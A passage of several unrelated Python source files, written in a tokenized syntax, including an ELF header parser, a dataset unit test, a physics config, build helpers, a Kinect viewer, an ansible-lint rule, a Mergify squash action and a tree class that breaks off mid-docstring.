"""<import_stmt>logging.config<import_from_stmt>lisa.config logging_config<line_sep>logging.config.dictConfig(logging_config)<line_sep>log=logging.getLogger()<line_sep>e_machine={2:'sparc' 3:'i386' 4:'m68k' 8:'mips' 18:'sparc32plus' 20:'ppc' 21:'ppc64' 22:'s390x' 40:'arm' 41:'alpha' 42:'sh4' 43:'sparc64' 62:'x86_64' 183:'aarch64'}<def_stmt>get_architecture file_path<block_start>"""Gets architecture and endianness information - needed
for starting guest machine and choosing proper image.
:param file_path: Path to file.
:returns: Tuple (arch, bit, endian)
"""<line_sep>arch=<none><line_sep>bit=<none><line_sep>endian=<none><with_stmt>open(file_path 'rb')<as>f<block_start>header=f.read(32)<line_sep># check ELF header 7xELF
<if_stmt>header[:4]<ne>b'\x7fELF'<block_start>log.critical('Analyzed file has invalid ELF header.')<line_sep><return>(<none> <none> <none>)<block_end># 32 vs 64 bit
<if_stmt>header[4]<eq>1<block_start>bit='32'<block_end><elif_stmt>header[4]<eq>2<block_start>bit='64'<block_end># endianess
<if_stmt>header[5]<eq>1<block_start>endian='little'<block_end><elif_stmt>header[5]<eq>2<block_start>endian='big'<block_end># processor architecture
byte_arch=bytearray(header[18:20])<line_sep>byte_arch_code=int.from_bytes(byte_arch endian)<if_stmt>byte_arch_code<in>e_machine<block_start>arch=e_machine[byte_arch_code]<block_end><block_end><return>(arch bit endian)<block_end>
|
<import_stmt>unittest<import_stmt>numpy<as>np<import_stmt>torch<import_from_stmt>pytorch_adapt.datasets CombinedSourceAndTargetDataset<import_from_stmt>pytorch_adapt.utils.common_functions join_lists<class_stmt>TestCombinedSourceAndTarget(unittest.TestCase)<block_start><def_stmt>test_combined self<block_start>np.random.seed(3429)<for_stmt>target_dataset_size [99 199]<block_start>src_dataset_size=117<line_sep>src=torch.arange(src_dataset_size)<line_sep>src=[{"src_imgs":i "src_labels":i}<for>i src]<line_sep>tgt=torch.arange(target_dataset_size)<line_sep>tgt=[{"target_imgs":i}<for>i tgt]<line_sep>d=CombinedSourceAndTargetDataset(src tgt)<line_sep>collected=[]<line_sep>num_loops=10000<line_sep>batch_size=64<line_sep>total_len=num_loops<times>batch_size<for_stmt>x range(num_loops)<block_start>collected.append([])<for_stmt>i range(batch_size)<block_start>batch=d[i]<line_sep>collected[x].append((batch["src_imgs"].item() batch["target_imgs"].item()))<block_end><block_end>all_src=[]<for_stmt>c collected<block_start>self.assertTrue([x[1]<for>x c]<eq>list(range(batch_size)))<line_sep>curr_src=[x[0]<for>x c]<line_sep># check for randomness
self.assertTrue(curr_src<not><in>all_src)<line_sep>all_src.append(curr_src)<block_end>all_src=join_lists(all_src)<line_sep>self.assertTrue(len(all_src)<eq>total_len)<line_sep>bincount=np.bincount(all_src)<line_sep>self.assertTrue(len(bincount)<eq>src_dataset_size)<line_sep>ideal_bincount=total_len<floordiv>src_dataset_size<line_sep>self.assertTrue(all(np.isclose(x ideal_bincount rtol=0.1)<for>x bincount))<block_end><block_end><block_end>
|
<import_stmt>FWCore.ParameterSet.Config<as>cms<line_sep>## IMPORTANT!
## This file was automatically generated by RecoBTag/CTagging/test/dump_training_vars_cfg.py
## with input xml files:
## - C vs L: ../data/c_vs_udsg.weight.xml sha1 checksum: 1b50773894bf3c64e41694bd48bda5f6f0e3795b
## - C vs B: ../data/c_vs_b.weight.xml sha1 checksum: c342f54c6448d488e6e2b483a3a3956e34ad8ea1
c_vs_l_vars_vpset=cms.VPSet(cms.PSet(default=cms.double(-1) name=cms.string('vertexLeptonCategory') taggingVarName=cms.string('vertexLeptonCategory')) cms.PSet(default=cms.double(-100) idx=cms.int32(0) name=cms.string('trackSip2dSig_0') taggingVarName=cms.string('trackSip2dSig')) cms.PSet(default=cms.double(-100) idx=cms.int32(1) name=cms.string('trackSip2dSig_1') taggingVarName=cms.string('trackSip2dSig')) cms.PSet(default=cms.double(-100) idx=cms.int32(0) name=cms.string('trackSip3dSig_0') taggingVarName=cms.string('trackSip3dSig')) cms.PSet(default=cms.double(-100) idx=cms.int32(1) name=cms.string('trackSip3dSig_1') taggingVarName=cms.string('trackSip3dSig')) cms.PSet(default=cms.double(-1) idx=cms.int32(0) name=cms.string('trackPtRel_0') taggingVarName=cms.string('trackPtRel')) cms.PSet(default=cms.double(-1) idx=cms.int32(1) name=cms.string('trackPtRel_1') taggingVarName=cms.string('trackPtRel')) cms.PSet(default=cms.double(-1) idx=cms.int32(0) name=cms.string('trackPPar_0') taggingVarName=cms.string('trackPPar')) cms.PSet(default=cms.double(-1) idx=cms.int32(1) name=cms.string('trackPPar_1') taggingVarName=cms.string('trackPPar')) cms.PSet(default=cms.double(-1) idx=cms.int32(0) name=cms.string('trackEtaRel_0') taggingVarName=cms.string('trackEtaRel')) cms.PSet(default=cms.double(-1) idx=cms.int32(1) name=cms.string('trackEtaRel_1') taggingVarName=cms.string('trackEtaRel')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(0) name=cms.string('trackDeltaR_0') taggingVarName=cms.string('trackDeltaR')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(1) name=cms.string('trackDeltaR_1') taggingVarName=cms.string('trackDeltaR')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(0) name=cms.string('trackPtRatio_0') taggingVarName=cms.string('trackPtRatio')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(1) name=cms.string('trackPtRatio_1') taggingVarName=cms.string('trackPtRatio')) cms.PSet(default=cms.double(1.1) idx=cms.int32(0) name=cms.string('trackPParRatio_0') taggingVarName=cms.string('trackPParRatio')) cms.PSet(default=cms.double(1.1) idx=cms.int32(1) name=cms.string('trackPParRatio_1') taggingVarName=cms.string('trackPParRatio')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(0) name=cms.string('trackJetDist_0') taggingVarName=cms.string('trackJetDist')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(1) name=cms.string('trackJetDist_1') taggingVarName=cms.string('trackJetDist')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(0) name=cms.string('trackDecayLenVal_0') taggingVarName=cms.string('trackDecayLenVal')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(1) name=cms.string('trackDecayLenVal_1') taggingVarName=cms.string('trackDecayLenVal')) cms.PSet(default=cms.double(0) name=cms.string('jetNSecondaryVertices') taggingVarName=cms.string('jetNSecondaryVertices')) cms.PSet(default=cms.double(-0.1) name=cms.string('jetNTracks') taggingVarName=cms.string('jetNTracks')) cms.PSet(default=cms.double(-0.1) name=cms.string('trackSumJetEtRatio') taggingVarName=cms.string('trackSumJetEtRatio')) cms.PSet(default=cms.double(-0.1) name=cms.string('trackSumJetDeltaR') taggingVarName=cms.string('trackSumJetDeltaR')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(0) name=cms.string('vertexMass_0') taggingVarName=cms.string('vertexMass')) cms.PSet(default=cms.double(-10) idx=cms.int32(0) name=cms.string('vertexEnergyRatio_0') taggingVarName=cms.string('vertexEnergyRatio')) cms.PSet(default=cms.double(-999) idx=cms.int32(0) name=cms.string('trackSip2dSigAboveCharm_0') taggingVarName=cms.string('trackSip2dSigAboveCharm')) cms.PSet(default=cms.double(-999) idx=cms.int32(0) name=cms.string('trackSip3dSigAboveCharm_0') taggingVarName=cms.string('trackSip3dSigAboveCharm')) cms.PSet(default=cms.double(-1) idx=cms.int32(0) name=cms.string('flightDistance2dSig_0') taggingVarName=cms.string('flightDistance2dSig')) cms.PSet(default=cms.double(-1) idx=cms.int32(0) name=cms.string('flightDistance3dSig_0') taggingVarName=cms.string('flightDistance3dSig')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(0) name=cms.string('vertexJetDeltaR_0') taggingVarName=cms.string('vertexJetDeltaR')) cms.PSet(default=cms.double(0) idx=cms.int32(0) name=cms.string('vertexNTracks_0') taggingVarName=cms.string('vertexNTracks')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(0) name=cms.string('massVertexEnergyFraction_0') taggingVarName=cms.string('massVertexEnergyFraction')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(0) name=cms.string('vertexBoostOverSqrtJetPt_0') taggingVarName=cms.string('vertexBoostOverSqrtJetPt')) cms.PSet(default=cms.double(-1) idx=cms.int32(0) name=cms.string('leptonPtRel_0') taggingVarName=cms.string('leptonPtRel')) cms.PSet(default=cms.double(-1) idx=cms.int32(1) name=cms.string('leptonPtRel_1') taggingVarName=cms.string('leptonPtRel')) cms.PSet(default=cms.double(-10000) idx=cms.int32(0) name=cms.string('leptonSip3d_0') taggingVarName=cms.string('leptonSip3d')) cms.PSet(default=cms.double(-10000) idx=cms.int32(1) name=cms.string('leptonSip3d_1') taggingVarName=cms.string('leptonSip3d')) cms.PSet(default=cms.double(-1) idx=cms.int32(0) name=cms.string('leptonDeltaR_0') taggingVarName=cms.string('leptonDeltaR')) cms.PSet(default=cms.double(-1) idx=cms.int32(1) name=cms.string('leptonDeltaR_1') taggingVarName=cms.string('leptonDeltaR')) cms.PSet(default=cms.double(-1) idx=cms.int32(0) name=cms.string('leptonRatioRel_0') taggingVarName=cms.string('leptonRatioRel')) cms.PSet(default=cms.double(-1) idx=cms.int32(1) name=cms.string('leptonRatioRel_1') taggingVarName=cms.string('leptonRatioRel')) cms.PSet(default=cms.double(-1) idx=cms.int32(0) name=cms.string('leptonEtaRel_0') taggingVarName=cms.string('leptonEtaRel')) cms.PSet(default=cms.double(-1) idx=cms.int32(1) name=cms.string('leptonEtaRel_1') taggingVarName=cms.string('leptonEtaRel')) cms.PSet(default=cms.double(-1) idx=cms.int32(0) name=cms.string('leptonRatio_0') taggingVarName=cms.string('leptonRatio')) cms.PSet(default=cms.double(-1) idx=cms.int32(1) name=cms.string('leptonRatio_1') taggingVarName=cms.string('leptonRatio')))<line_sep>c_vs_b_vars_vpset=cms.VPSet(cms.PSet(default=cms.double(-1) name=cms.string('vertexLeptonCategory') taggingVarName=cms.string('vertexLeptonCategory')) cms.PSet(default=cms.double(-100) idx=cms.int32(0) name=cms.string('trackSip2dSig_0') taggingVarName=cms.string('trackSip2dSig')) cms.PSet(default=cms.double(-100) idx=cms.int32(1) name=cms.string('trackSip2dSig_1') taggingVarName=cms.string('trackSip2dSig')) cms.PSet(default=cms.double(-100) idx=cms.int32(0) name=cms.string('trackSip3dSig_0') taggingVarName=cms.string('trackSip3dSig')) cms.PSet(default=cms.double(-100) idx=cms.int32(1) name=cms.string('trackSip3dSig_1') taggingVarName=cms.string('trackSip3dSig')) cms.PSet(default=cms.double(-1) idx=cms.int32(0) name=cms.string('trackPtRel_0') taggingVarName=cms.string('trackPtRel')) cms.PSet(default=cms.double(-1) idx=cms.int32(1) name=cms.string('trackPtRel_1') taggingVarName=cms.string('trackPtRel')) cms.PSet(default=cms.double(-1) idx=cms.int32(0) name=cms.string('trackPPar_0') taggingVarName=cms.string('trackPPar')) cms.PSet(default=cms.double(-1) idx=cms.int32(1) name=cms.string('trackPPar_1') taggingVarName=cms.string('trackPPar')) cms.PSet(default=cms.double(-1) idx=cms.int32(0) name=cms.string('trackEtaRel_0') taggingVarName=cms.string('trackEtaRel')) cms.PSet(default=cms.double(-1) idx=cms.int32(1) name=cms.string('trackEtaRel_1') taggingVarName=cms.string('trackEtaRel')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(0) name=cms.string('trackDeltaR_0') taggingVarName=cms.string('trackDeltaR')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(1) name=cms.string('trackDeltaR_1') taggingVarName=cms.string('trackDeltaR')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(0) name=cms.string('trackPtRatio_0') taggingVarName=cms.string('trackPtRatio')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(1) name=cms.string('trackPtRatio_1') taggingVarName=cms.string('trackPtRatio')) cms.PSet(default=cms.double(1.1) idx=cms.int32(0) name=cms.string('trackPParRatio_0') taggingVarName=cms.string('trackPParRatio')) cms.PSet(default=cms.double(1.1) idx=cms.int32(1) name=cms.string('trackPParRatio_1') taggingVarName=cms.string('trackPParRatio')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(0) name=cms.string('trackJetDist_0') taggingVarName=cms.string('trackJetDist')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(1) name=cms.string('trackJetDist_1') taggingVarName=cms.string('trackJetDist')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(0) name=cms.string('trackDecayLenVal_0') taggingVarName=cms.string('trackDecayLenVal')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(1) name=cms.string('trackDecayLenVal_1') taggingVarName=cms.string('trackDecayLenVal')) cms.PSet(default=cms.double(0) name=cms.string('jetNSecondaryVertices') taggingVarName=cms.string('jetNSecondaryVertices')) cms.PSet(default=cms.double(-0.1) name=cms.string('jetNTracks') taggingVarName=cms.string('jetNTracks')) cms.PSet(default=cms.double(-0.1) name=cms.string('trackSumJetEtRatio') taggingVarName=cms.string('trackSumJetEtRatio')) cms.PSet(default=cms.double(-0.1) name=cms.string('trackSumJetDeltaR') taggingVarName=cms.string('trackSumJetDeltaR')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(0) name=cms.string('vertexMass_0') taggingVarName=cms.string('vertexMass')) cms.PSet(default=cms.double(-10) idx=cms.int32(0) name=cms.string('vertexEnergyRatio_0') taggingVarName=cms.string('vertexEnergyRatio')) cms.PSet(default=cms.double(-999) idx=cms.int32(0) name=cms.string('trackSip2dSigAboveCharm_0') taggingVarName=cms.string('trackSip2dSigAboveCharm')) cms.PSet(default=cms.double(-999) idx=cms.int32(0) name=cms.string('trackSip3dSigAboveCharm_0') taggingVarName=cms.string('trackSip3dSigAboveCharm')) cms.PSet(default=cms.double(-1) idx=cms.int32(0) name=cms.string('flightDistance2dSig_0') taggingVarName=cms.string('flightDistance2dSig')) cms.PSet(default=cms.double(-1) idx=cms.int32(0) name=cms.string('flightDistance3dSig_0') taggingVarName=cms.string('flightDistance3dSig')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(0) name=cms.string('vertexJetDeltaR_0') taggingVarName=cms.string('vertexJetDeltaR')) cms.PSet(default=cms.double(0) idx=cms.int32(0) name=cms.string('vertexNTracks_0') taggingVarName=cms.string('vertexNTracks')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(0) name=cms.string('massVertexEnergyFraction_0') taggingVarName=cms.string('massVertexEnergyFraction')) cms.PSet(default=cms.double(-0.1) idx=cms.int32(0) name=cms.string('vertexBoostOverSqrtJetPt_0') taggingVarName=cms.string('vertexBoostOverSqrtJetPt')) cms.PSet(default=cms.double(-1) idx=cms.int32(0) name=cms.string('leptonPtRel_0') taggingVarName=cms.string('leptonPtRel')) cms.PSet(default=cms.double(-1) idx=cms.int32(1) name=cms.string('leptonPtRel_1') taggingVarName=cms.string('leptonPtRel')) cms.PSet(default=cms.double(-10000) idx=cms.int32(0) name=cms.string('leptonSip3d_0') taggingVarName=cms.string('leptonSip3d')) cms.PSet(default=cms.double(-10000) idx=cms.int32(1) name=cms.string('leptonSip3d_1') taggingVarName=cms.string('leptonSip3d')) cms.PSet(default=cms.double(-1) idx=cms.int32(0) name=cms.string('leptonDeltaR_0') taggingVarName=cms.string('leptonDeltaR')) cms.PSet(default=cms.double(-1) idx=cms.int32(1) name=cms.string('leptonDeltaR_1') taggingVarName=cms.string('leptonDeltaR')) cms.PSet(default=cms.double(-1) idx=cms.int32(0) name=cms.string('leptonRatioRel_0') taggingVarName=cms.string('leptonRatioRel')) cms.PSet(default=cms.double(-1) idx=cms.int32(1) name=cms.string('leptonRatioRel_1') taggingVarName=cms.string('leptonRatioRel')) cms.PSet(default=cms.double(-1) idx=cms.int32(0) name=cms.string('leptonEtaRel_0') taggingVarName=cms.string('leptonEtaRel')) cms.PSet(default=cms.double(-1) idx=cms.int32(1) name=cms.string('leptonEtaRel_1') taggingVarName=cms.string('leptonEtaRel')) cms.PSet(default=cms.double(-1) idx=cms.int32(0) name=cms.string('leptonRatio_0') taggingVarName=cms.string('leptonRatio')) cms.PSet(default=cms.double(-1) idx=cms.int32(1) name=cms.string('leptonRatio_1') taggingVarName=cms.string('leptonRatio')))<line_sep>
|
# coding: utf-8
"""Miscellaneous helpers."""<import_stmt>inspect<import_stmt>subprocess<import_stmt>sys<import_from_stmt>pathlib Path<import_from_stmt>typing Any Callable Iterator List Optional<import_from_stmt>docker.types Mount# type: ignore
<import_from_stmt>buildchain config<import_from_stmt>buildchain constants<import_from_stmt>buildchain types<def_stmt>export_only_tasks module_name:str<arrow>List[str]<block_start>"""Return the list of tasks defined in the specified module.
Arguments:
module_name: name of the module
Returns:
The name of all the task-creator defined in this module.
"""<line_sep><return>[name<for>name,_ inspect.getmembers(sys.modules[module_name] inspect.isfunction)<if>name.startswith("task_")]<block_end><def_stmt>build_relpath path:Path<arrow>Path<block_start>"""Return the given path, but relative to the build root.
Arguments:
path: an absolute path inside the build directory
Returns:
The same path, but relative to the build directory.
Examples:
>>> build_relpath(Path('/home/foo/metalk8s/_build/metalk8s.iso'))
PosixPath('_build/metalk8s.iso')
"""<line_sep><return>path.relative_to(config.BUILD_ROOT.parent)<block_end><def_stmt>title_with_target1 command:str<arrow>Callable[[types.Task] str]<block_start>"""Return a title with the command suffixed with the first target.
Arguments:
command: name of the command
task: a doit task
Returns:
A function that returns the title
"""<def_stmt>title task:types.Task<arrow>str<block_start><return>"{cmd: <{width}} {path}".format(cmd=command width=constants.CMD_WIDTH path=build_relpath(Path(task.targets[0])) )<block_end><return>title<block_end><def_stmt>title_with_subtask_name command:str<arrow>Callable[[types.Task] str]<block_start>"""Return a title with the command suffixed with the sub-task name.
Arguments:
command: name of the command
task: a doit task
Returns:
A function that returns the title
"""<def_stmt>title task:types.Task<arrow>str# Extract the sub-task name (the part after `:`) from the task name.
<block_start><return>"{cmd: <{width}} {name}".format(cmd=command width=constants.CMD_WIDTH name=task.name.split(":")[1])<block_end><return>title<block_end><def_stmt>bind_mount source:Path target:Path **kwargs:Any<arrow>Mount<block_start>"""Return a Docker mount object.
Arguments:
source: the host path to be mounted
target: the container path the source should be mounted to
Keyword arguments:
Passed through to the underlying docker.services.Mount object
initialization
"""<line_sep><return>Mount(source=str(source) target=str(target) type="bind" **kwargs)<block_end><def_stmt>bind_ro_mount source:Path target:Path<arrow>Mount<block_start>"""Return *read-only* Docker mount object.
Arguments:
source: the host path to be mounted
target: the container path the source should be mounted to
"""<line_sep><return>bind_mount(source=source target=target read_only=<true>)<block_end><def_stmt>git_ls directory:Optional[str]=<none><arrow>Iterator[Path]<block_start>"""Return the list of files tracked by Git under `root` (recursively).
Arguments:
directory: directory to list (relative to the root of the repo).
Returns:
A list of files tracked by Git.
"""<line_sep>root=constants.ROOT<if>directory<is><none><else>constants.ROOT/directory<assert_stmt>root.is_dir()<line_sep><return>map(Path subprocess.check_output(["git" "ls-files" "-z" root] encoding="utf-8").split("\x00")[:-1] )<block_end># `:-1` to skip the last element (empty string).
<def_stmt>unlink_if_exist filepath:Path<arrow><none><block_start>"""Delete a file if it exists."""<try_stmt><block_start>filepath.unlink()<block_end><except_stmt>FileNotFoundError<block_start><pass><block_end><block_end>
|
'''
simple_viewer.py
A simple viewer to demonstrate the image capture capabilities of an Azure
Kinect device using the Python API. This is not the fastest way to display
a sequence of images; this is only meant to show how to capture frames
in a sequence.
Requirements:
Users should install the following python packages before using this module:
matplotlib
Copyright (c) Microsoft Corporation. All rights reserved.
Licensed under the MIT License.
Kinect For Azure SDK.
'''<line_sep># This package is used for displaying the images.
# It is not part of the k4a package and is not a hard requirement for k4a.
# Users need to install these packages in order to use this module.
<import_stmt>matplotlib.pyplot<as>plt<line_sep># This will import all the public symbols into the k4a namespace.
<import_stmt>k4a<def_stmt>simple_viewer # Open a device using the static function Device.open().
<block_start>device=k4a.Device.open()<line_sep># In order to start capturing frames, need to start the cameras.
# The start_cameras() function requires a device configuration which
# specifies the modes in which to put the color and depth cameras.
# For convenience, the k4a package pre-defines some configurations
# for common usage of the Azure Kinect device, but the user can
# modify the values to set the device in their preferred modes.
device_config=k4a.DEVICE_CONFIG_BGRA32_2160P_WFOV_2X2BINNED_FPS15<line_sep>device.start_cameras(device_config)<line_sep># Get a capture.
# The -1 tells the device to wait forever until a capture is available.
capture=device.get_capture(-1)<line_sep># Open a matplotlib figure to display images.
fig=plt.figure()<line_sep>ax=[]<line_sep>ax.append(fig.add_subplot(1 3 1 label="Color"))<line_sep>ax.append(fig.add_subplot(1 3 2 label="Depth"))<line_sep>ax.append(fig.add_subplot(1 3 3 label="IR"))<line_sep># The capture has the following fields that can be read right away:
# color : the color image
# depth : the depth image
# ir : the ir image
im=[]<line_sep>im.append(ax[0].imshow(capture.color.data))<line_sep>im.append(ax[1].imshow(capture.depth.data cmap='jet'))<line_sep>im.append(ax[2].imshow(capture.ir.data cmap='gray'))<line_sep>ax[0].title.set_text('Color')<line_sep>ax[1].title.set_text('Depth')<line_sep>ax[2].title.set_text('IR')<line_sep># Note: The data in the images is in BGRA planes, but the matplotlib
# library expects them to be in RGBA. This results in an inverted color
# display if not properly handled. The user can splice the planes as
# appropriate or use opencv which has a function call to transform
# BGRA into RGBA.
<while_stmt>fig<is><not><none># Draw the figure with the images.
<block_start>plt.pause(.1)<line_sep>plt.draw()<line_sep># Get a new capture.
capture=device.get_capture(-1)<if_stmt>capture<is><none><block_start><del_stmt>fig<line_sep><break><block_end># Update the images in the figures.
im[0].set_data(capture.color.data)<line_sep>im[1].set_data(capture.depth.data)<line_sep>im[2].set_data(capture.ir.data)<line_sep># There is no need to delete the capture since Python will take care of
# that in the object's deleter.
<block_end># There is no need to stop the cameras since the deleter will stop
# the cameras, but it's still prudent to do it explicitly.
device.stop_cameras()<line_sep># There is no need to delete resources since Python will take care
# of releasing resources in the objects' deleters.
<block_end><if_stmt>__name__<eq>'__main__'<block_start>simple_viewer()<block_end>
|
"""All tasks should be have name come first."""<import_stmt>sys<import_from_stmt>typing Any Dict Optional Union<import_from_stmt>ansiblelint.file_utils Lintable<import_from_stmt>ansiblelint.rules AnsibleLintRule<import_from_stmt>ansiblelint.testing RunFromText<class_stmt>KeyOrderRule(AnsibleLintRule)<block_start>"""Ensure specific order of keys in mappings."""<line_sep>id="key-order"<line_sep>shortdesc=__doc__<line_sep>severity="LOW"<line_sep>tags=["formatting" "experimental"]<line_sep>version_added="v6.2.0"<line_sep>needs_raw_task=<true><def_stmt>matchtask self task:Dict[str Any] file:Optional[Lintable]=<none><arrow>Union[bool str]<block_start>raw_task=task["__raw_task__"]<if_stmt>"name"<in>raw_task<block_start>attribute_list=[*raw_task]<if_stmt>bool(attribute_list[0]<ne>"name")<block_start><return>"'name' key is not first"<block_end><block_end><return><false><block_end><block_end># testing code to be loaded only with pytest or when executed the rule file
<if_stmt>"pytest"<in>sys.modules<block_start><import_stmt>pytest<line_sep>PLAY_FAIL="""---
- hosts: localhost
tasks:
- no_log: true
shell: echo hello
name: task with no_log on top
- when: true
name: task with when on top
shell: echo hello
- delegate_to: localhost
name: delegate_to on top
shell: echo hello
- loop:
- 1
- 2
name: loopy
command: echo {{ item }}
- become: true
name: become first
shell: echo hello
- register: test
shell: echo hello
name: register first
"""<line_sep>PLAY_SUCCESS="""---
- hosts: localhost
tasks:
- name: test
command: echo "test"
- name: test2
debug:
msg: "Debug without a name"
- name: Flush handlers
meta: flush_handlers
- no_log: true # noqa key-order
shell: echo hello
name: task with no_log on top
"""<line_sep>@pytest.mark.parametrize("rule_runner" (KeyOrderRule ) indirect=["rule_runner"])<def_stmt>test_task_name_has_name_first_rule_pass rule_runner:RunFromText<arrow><none><block_start>"""Test rule matches."""<line_sep>results=rule_runner.run_playbook(PLAY_SUCCESS)<assert_stmt>len(results)<eq>0<block_end>@pytest.mark.parametrize("rule_runner" (KeyOrderRule ) indirect=["rule_runner"])<def_stmt>test_task_name_has_name_first_rule_fail rule_runner:RunFromText<arrow><none><block_start>"""Test rule matches."""<line_sep>results=rule_runner.run_playbook(PLAY_FAIL)<assert_stmt>len(results)<eq>6<block_end><block_end>
|
<import_stmt>pywasm<line_sep># pywasm.on_debug()
runtime=pywasm.load('./examples/fib.wasm')<line_sep>r=runtime.exec('fib' [10])<line_sep>print(r)<line_sep>
|
"""
Install any components that fall under 'galaxy' directive in main.yaml
"""<import_from_stmt>cloudbio.galaxy _setup_users<import_from_stmt>cloudbio.galaxy _setup_galaxy_env_defaults<import_from_stmt>cloudbio.galaxy _install_galaxy<import_from_stmt>cloudbio.galaxy _configure_galaxy_options<def_stmt>install_galaxy_webapp env<block_start>_prep_galaxy(env)<line_sep>_install_galaxy(env)<line_sep>_configure_galaxy_options(env)<block_end><def_stmt>_prep_galaxy env<block_start>_setup_users(env)<line_sep>_setup_galaxy_env_defaults(env)<block_end>
|
# -*- encoding: utf-8 -*-
#
# Copyright © 2021 Mergify SAS
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
<import_stmt>typing<import_stmt>voluptuous<import_from_stmt>mergify_engine actions<import_from_stmt>mergify_engine check_api<import_from_stmt>mergify_engine context<import_from_stmt>mergify_engine rules<import_from_stmt>mergify_engine signals<import_from_stmt>mergify_engine squash_pull<import_from_stmt>mergify_engine.actions utils<as>action_utils<import_from_stmt>mergify_engine.dashboard subscription<import_from_stmt>mergify_engine.rules types<class_stmt>SquashAction(actions.Action)<block_start>flags=(actions.ActionFlag.ALLOW_AS_ACTION|actions.ActionFlag.ALLOW_AS_COMMAND|actions.ActionFlag.ALWAYS_RUN|actions.ActionFlag.ALLOW_ON_CONFIGURATION_CHANGED|actions.ActionFlag.DISALLOW_RERUN_ON_OTHER_RULES)<line_sep>validator={voluptuous.Required("bot_account" default=<none>):voluptuous.Any(<none> types.Jinja2) voluptuous.Required("commit_message" default="all-commits"):voluptuous.Any("all-commits" "first-commit" "title+body") }<line_sep>@staticmethod<def_stmt>command_to_config string:str<arrow>typing.Dict[str typing.Any]<block_start><if_stmt>string<block_start><return>{"commit_message":string.strip()}<block_end><else_stmt><block_start><return>{}<block_end><block_end><async_keyword><def_stmt>run self ctxt:context.Context rule:rules.EvaluatedRule<arrow>check_api.Result<block_start><try_stmt><block_start>bot_account=<await>action_utils.render_bot_account(ctxt self.config["bot_account"] required_feature=subscription.Features.BOT_ACCOUNT missing_feature_message="Squash with `bot_account` set are disabled" required_permissions=[] )<block_end><except_stmt>action_utils.RenderBotAccountFailure<as>e<block_start><return>check_api.Result(e.status e.title e.reason)<block_end><if_stmt>ctxt.pull["commits"]<le>1<block_start><return>check_api.Result(check_api.Conclusion.SUCCESS "Pull request is already one-commit long" "" )<block_end><try_stmt><block_start>commit_title_and_message=<await>ctxt.pull_request.get_commit_message()<block_end><except_stmt>context.RenderTemplateFailure<as>rmf<block_start><return>check_api.Result(check_api.Conclusion.ACTION_REQUIRED "Invalid commit message" str(rmf) )<block_end><if_stmt>commit_title_and_message<is><not><none><block_start>title,message=commit_title_and_message<line_sep>message=f"{title}\n\n{message}"<block_end><elif_stmt>self.config["commit_message"]<eq>"all-commits"<block_start>message=f"{(<await>ctxt.pull_request.title)} (#{(<await>ctxt.pull_request.number)})\n"<line_sep>message<augadd>"\n\n* ".join([commit["commit_message"]<for>commit <await>ctxt.commits])<block_end><elif_stmt>self.config["commit_message"]<eq>"first-commit"<block_start>message=(<await>ctxt.commits)[0]["commit_message"]<block_end><elif_stmt>self.config["commit_message"]<eq>"title+body"<block_start>message=f"{(<await>ctxt.pull_request.title)} (#{(<await>ctxt.pull_request.number)})"<line_sep>message<augadd>f"\n\n{<await>ctxt.pull_request.body}"<block_end><else_stmt><block_start><raise>RuntimeError("Unsupported commit_message option")<block_end><try_stmt><block_start><await>squash_pull.squash(ctxt message bot_account )<block_end><except_stmt>squash_pull.SquashFailure<as>e<block_start><return>check_api.Result(check_api.Conclusion.FAILURE "Pull request squash failed" e.reason)<block_end><else_stmt><block_start><await>signals.send(ctxt "action.squash")<block_end><return>check_api.Result(check_api.Conclusion.SUCCESS "Pull request squashed successfully" "")<block_end><async_keyword><def_stmt>cancel self ctxt:context.Context rule:"rules.EvaluatedRule"<arrow>check_api.Result# pragma: no cover
<block_start><return>actions.CANCELLED_CHECK_REPORT<block_end><block_end>
|
"""Simple class containing the tree structure for the canvas items."""<import_from_stmt>typing Dict Generic Iterable List Optional Sequence TypeVar Union<line_sep>T=TypeVar("T")<class_stmt>Tree(Generic[T])<block_start>"""A Tree structure. Nodes are stores in a depth-first order.
``None`` is the root node.
@invariant: len(self._children) == len(self._nodes) + 1
"""<def_stmt>__init__ self<arrow><none># List of nodes in the tree, sorted in the order they ought to be
# rendered
<block_start>self._nodes:List[T]=[]<line_sep># Per entry a list of children is maintained.
self._children:Dict[Union[T <none>] List[T]]={<none>:[]}<line_sep># For easy and fast lookups, also maintain a child -> parent mapping
self._parents:Dict[T T]={}<block_end>@property<def_stmt>nodes self<arrow>Sequence[T]<block_start><return>list(self._nodes)<block_end><def_stmt>get_parent self node:T<arrow>Optional[T]<block_start>"""Return the parent item of ``node``.
>>> tree = Tree()
>>> tree.add('n1')
>>> tree.add('n2', parent='n1')
>>> tree.get_parent('n2')
'n1'
"""<line_sep><return>self._parents.get(node)<block_end><def_stmt>get_children self node:Optional[T]<arrow>Iterable[T]<block_start>"""Return all child objects of ``node``.
>>> tree = Tree()
>>> tree.add('n1')
>>> tree.add('n2', parent='n1')
>>> tree.add('n3', parent='n1')
>>> tree.get_children('n1')
['n2', 'n3']
>>> tree.get_children('n2')
